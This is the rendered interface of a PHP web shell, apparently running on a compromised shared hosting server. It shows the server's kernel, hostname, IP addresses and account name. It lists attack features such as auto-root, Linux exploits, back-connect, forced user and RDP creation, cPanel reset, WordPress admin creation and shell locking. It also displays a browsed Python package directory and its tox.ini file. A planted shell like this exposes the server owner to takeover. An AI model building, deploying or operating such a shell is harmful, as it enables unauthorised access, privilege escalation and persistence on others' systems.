Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.217.34
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
cachetools /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
98
B
-rw-r--r--
.readthedocs.yaml
135
B
-rw-r--r--
CHANGELOG.rst
9.63
KB
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
MANIFEST.in
193
B
-rw-r--r--
README.rst
4.24
KB
-rw-r--r--
pyproject.toml
100
B
-rw-r--r--
setup.cfg
1.31
KB
-rw-r--r--
setup.py
38
B
-rw-r--r--
tox.ini
850
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tox.ini
[tox] envlist = check-manifest,docs,doctest,flake8,py [testenv] deps = pytest pytest-cov commands = py.test --basetemp={envtmpdir} --cov=cachetools {posargs} [testenv:check-manifest] deps = check-manifest==0.44; python_version < "3.8" check-manifest; python_version >= "3.8" commands = check-manifest skip_install = true [testenv:docs] deps = sphinx commands = sphinx-build -W -b html -d {envtmpdir}/doctrees docs {envtmpdir}/html [testenv:doctest] deps = sphinx commands = sphinx-build -W -b doctest -d {envtmpdir}/doctrees docs {envtmpdir}/doctest [testenv:flake8] deps = flake8 flake8-black; implementation_name == "cpython" black==22.12.0; implementation_name == "cpython" and python_version < "3.8" flake8-bugbear flake8-import-order commands = flake8 skip_install = true
Close